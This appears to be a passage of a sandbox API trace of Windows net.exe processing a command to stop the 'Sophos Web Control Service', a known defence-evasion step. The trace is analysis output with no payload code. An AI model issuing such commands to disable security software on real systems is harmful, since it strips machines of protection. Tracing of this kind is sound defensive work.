(_String1="localgroup", _String2="Web") returned -11 [0199.519] _wcsicmp (_String1="pause", _String2="Web") returned -7 [0199.519] _wcsicmp (_String1="session", _String2="Web") returned -4 [0199.519] _wcsicmp (_String1="sessions", _String2="Web") returned -4 [0199.519] _wcsicmp (_String1="sess", _String2="Web") returned -4 [0199.519] _wcsicmp (_String1="share", _String2="Web") returned -4 [0199.519] _wcsicmp (_String1="start", _String2="Web") returned -4 [0199.519] _wcsicmp (_String1="stats", _String2="Web") returned -4 [0199.519] _wcsicmp (_String1="statistics", _String2="Web") returned -4 [0199.519] _wcsicmp (_String1="stop", _String2="Web") returned -4 [0199.519] _wcsicmp (_String1="time", _String2="Web") returned -3 [0199.519] _wcsicmp (_String1="user", _String2="Web") returned -2 [0199.519] _wcsicmp (_String1="users", _String2="Web") returned -2 [0199.519] _wcsicmp (_String1="msg", _String2="Web") returned -10 [0199.519] _wcsicmp (_String1="messenger", _String2="Web") returned -10 [0199.519] _wcsicmp (_String1="receiver", _String2="Web") returned -5 [0199.519] _wcsicmp (_String1="rcv", _String2="Web") returned -5 [0199.519] _wcsicmp (_String1="netpopup", _String2="Web") returned -9 [0199.519] _wcsicmp (_String1="redirector", _String2="Web") returned -5 [0199.520] _wcsicmp (_String1="redir", _String2="Web") returned -5 [0199.520] _wcsicmp (_String1="rdr", _String2="Web") returned -5 [0199.520] _wcsicmp (_String1="workstation", _String2="Web") returned 10 [0199.520] _wcsicmp (_String1="work", _String2="Web") returned 10 [0199.520] _wcsicmp (_String1="wksta", _String2="Web") returned 6 [0199.520] _wcsicmp (_String1="prdr", _String2="Web") returned -7 [0199.520] _wcsicmp (_String1="devrdr", _String2="Web") returned -19 [0199.520] _wcsicmp (_String1="lanmanworkstation", _String2="Web") returned -11 [0199.520] _wcsicmp (_String1="server", _String2="Web") returned -4 [0199.520] _wcsicmp (_String1="svr", _String2="Web") returned -4 [0199.520] _wcsicmp (_String1="srv", _String2="Web") returned -4 [0199.520] _wcsicmp (_String1="lanmanserver", _String2="Web") returned -11 [0199.520] _wcsicmp (_String1="alerter", _String2="Web") returned -22 [0199.520] _wcsicmp (_String1="netlogon", _String2="Web") returned -9 [0199.520] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0199.520] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.520] wcscpy_s (in: _Destination=0x14f9ec, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0199.520] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a00000 [0199.521] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x14f9e8, nSize=0x0, Arguments=0x14f9e4 | out: lpBuffer="噠Wneth.dll") returned 0xff [0199.522] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0199.522] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0199.522] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0199.522] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0199.522] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0199.523] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0199.523] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0199.523] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0199.523] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0199.523] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0199.523] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.523] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0199.523] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0199.523] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0199.523] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.523] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0199.523] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0199.523] _wcsicmp (_String1="CONT", _String2="Web") returned -20 [0199.523] _wcsicmp (_String1="CONT", _String2="Control") returned -114 [0199.523] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0199.523] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.523] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0199.523] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.523] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0199.523] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.523] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0199.523] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0199.523] _wcsicmp (_String1="FILES", _String2="Web") returned -17 [0199.523] _wcsicmp (_String1="FILES", _String2="Control") returned 3 [0199.523] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0199.523] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.523] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0199.523] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.523] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0199.523] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.523] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0199.523] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0199.523] _wcsicmp (_String1="GROUPS", _String2="Web") returned -16 [0199.523] _wcsicmp (_String1="GROUPS", _String2="Control") returned 4 [0199.523] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0199.524] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.524] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0199.524] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.524] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0199.524] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.524] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0199.524] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0199.524] _wcsicmp (_String1="REPL", _String2="Web") returned -5 [0199.524] _wcsicmp (_String1="REPL", _String2="Control") returned 15 [0199.524] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0199.524] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0199.524] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.524] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0199.524] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0199.524] _wcsicmp (_String1="REPLICATOR", _String2="Web") returned -5 [0199.524] _wcsicmp (_String1="REPLICATOR", _String2="Control") returned 15 [0199.524] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0199.524] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.524] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0199.524] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.524] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0199.524] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.524] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0199.524] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0199.524] _wcsicmp (_String1="SESSIONS", _String2="Web") returned -4 [0199.524] _wcsicmp (_String1="SESSIONS", _String2="Control") returned 16 [0199.524] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0199.524] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0199.524] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.524] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0199.524] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0199.524] _wcsicmp (_String1="SESS", _String2="Web") returned -4 [0199.524] _wcsicmp (_String1="SESS", _String2="Control") returned 16 [0199.524] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0199.524] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.524] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0199.525] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.525] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0199.525] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.525] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0199.525] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0199.525] _wcsicmp (_String1="STATS", _String2="Web") returned -4 [0199.525] _wcsicmp (_String1="STATS", _String2="Control") returned 16 [0199.525] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0199.525] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.525] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0199.525] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.525] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0199.525] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.525] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0199.525] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0199.525] _wcsicmp (_String1="USERS", _String2="Web") returned -2 [0199.525] _wcsicmp (_String1="USERS", _String2="Control") returned 18 [0199.525] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0199.525] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.525] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0199.525] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.525] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0199.525] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.525] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0199.525] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0199.525] _wcsicmp (_String1="REDIRECTOR", _String2="Web") returned -5 [0199.525] _wcsicmp (_String1="REDIRECTOR", _String2="Control") returned 15 [0199.525] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0199.525] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0199.525] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.525] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0199.525] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0199.525] _wcsicmp (_String1="REDIR", _String2="Web") returned -5 [0199.525] _wcsicmp (_String1="REDIR", _String2="Control") returned 15 [0199.525] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0199.526] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0199.526] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.526] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0199.526] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0199.526] _wcsicmp (_String1="RDR", _String2="Web") returned -5 [0199.526] _wcsicmp (_String1="RDR", _String2="Control") returned 15 [0199.526] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0199.526] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0199.526] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.526] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0199.526] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0199.526] _wcsicmp (_String1="WORK", _String2="Web") returned 10 [0199.526] _wcsicmp (_String1="WORK", _String2="Control") returned 20 [0199.526] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0199.526] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0199.526] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.526] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0199.526] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0199.526] _wcsicmp (_String1="WKSTA", _String2="Web") returned 6 [0199.526] _wcsicmp (_String1="WKSTA", _String2="Control") returned 20 [0199.526] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0199.526] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0199.526] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.526] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0199.526] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0199.526] _wcsicmp (_String1="PRDR", _String2="Web") returned -7 [0199.526] _wcsicmp (_String1="PRDR", _String2="Control") returned 13 [0199.526] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0199.526] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0199.526] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0199.526] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0199.527] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0199.527] _wcsicmp (_String1="DEVRDR", _String2="Web") returned -19 [0199.527] _wcsicmp (_String1="DEVRDR", _String2="Control") returned 1 [0199.527] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0199.527] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.527] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0199.527] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.527] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0199.527] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0199.527] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0199.527] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0199.527] _wcsicmp (_String1="SVR", _String2="Web") returned -4 [0199.527] _wcsicmp (_String1="SVR", _String2="Control") returned 16 [0199.527] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0199.527] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0199.527] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.527] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0199.527] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0199.527] _wcsicmp (_String1="SRV", _String2="Web") returned -4 [0199.527] _wcsicmp (_String1="SRV", _String2="Control") returned 16 [0199.527] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0199.527] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.527] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x14f9e8, nSize=0x0, Arguments=0x14f9e4 | out: lpBuffer="㼰Wꔺ瓡") returned 0x1c [0199.527] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0199.527] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0199.527] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0199.527] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0199.527] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0199.527] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0199.527] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0199.527] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.527] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0199.527] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0199.527] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0199.528] wcscpy_s (in: _Destination=0x6aa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0199.528] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0199.530] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x6ab338, nSize=0x800, Arguments=0x6a9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0199.530] GetFileType (hFile=0x26c) returned 0x3 [0199.530] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x574200 [0199.530] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x574200, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0199.530] WriteFile (in: hFile=0x26c, lpBuffer=0x574200, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14f9c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f9c8, lpOverlapped=0x0) returned 0 [0199.530] LocalFree (hMem=0x574200) returned 0x0 [0199.530] GetFileType (hFile=0x26c) returned 0x3 [0199.530] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x573d90 [0199.530] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x573d90, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nW", lpUsedDefaultChar=0x0) returned 2 [0199.530] WriteFile (in: hFile=0x26c, lpBuffer=0x573d90, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14f9c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f9c8, lpOverlapped=0x0) returned 0 [0199.530] LocalFree (hMem=0x573d90) returned 0x0 [0199.531] wcscpy_s (in: _Destination=0x14fa80, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0199.531] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0199.531] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0199.531] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0199.531] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0199.531] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0199.531] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="Web", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Web") returned 0x0 [0199.531] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Web", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Web ") returned 0x0 [0199.531] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Web ", _SizeInWords=0x200, _Source="Control", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Web Control") returned 0x0 [0199.531] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Web Control", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Web Control ") returned 0x0 [0199.531] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos Web Control ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥") returned 0x0 [0199.531] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W댸j溺\x14Ѱjɬ") returned 0xad [0199.531] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes | NO", _MaxCount=0x29) returned 18 [0199.531] LocalFree (hMem=0x575868) returned 0x0 [0199.531] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x2e [0199.531] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /DEL", _MaxCount=0x29) returned 16 [0199.531] LocalFree (hMem=0x573f78) returned 0x0 [0199.531] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0x7d [0199.531] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:time]", _MaxCount=0x29) returned 16 [0199.531] LocalFree (hMem=0x575868) returned 0x0 [0199.531] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x26 [0199.531] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x29) returned 16 [0199.531] LocalFree (hMem=0x573f78) returned 0x0 [0199.531] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x19 [0199.531] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x29) returned 16 [0199.531] LocalFree (hMem=0x573f78) returned 0x0 [0199.531] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x1b [0199.531] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x29) returned 13 [0199.531] LocalFree (hMem=0x573f78) returned 0x0 [0199.531] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="塨W⡋瓢婢\x14㽸W寮\x14") returned 0xbe [0199.531] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"]] ", _MaxCount=0x29) returned 12 [0199.531] LocalFree (hMem=0x575868) returned 0x0 [0199.532] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14塨W寮\x14") returned 0x33 [0199.532] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Web Control ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET command", _MaxCount=0x29) returned 11 [0199.532] LocalFree 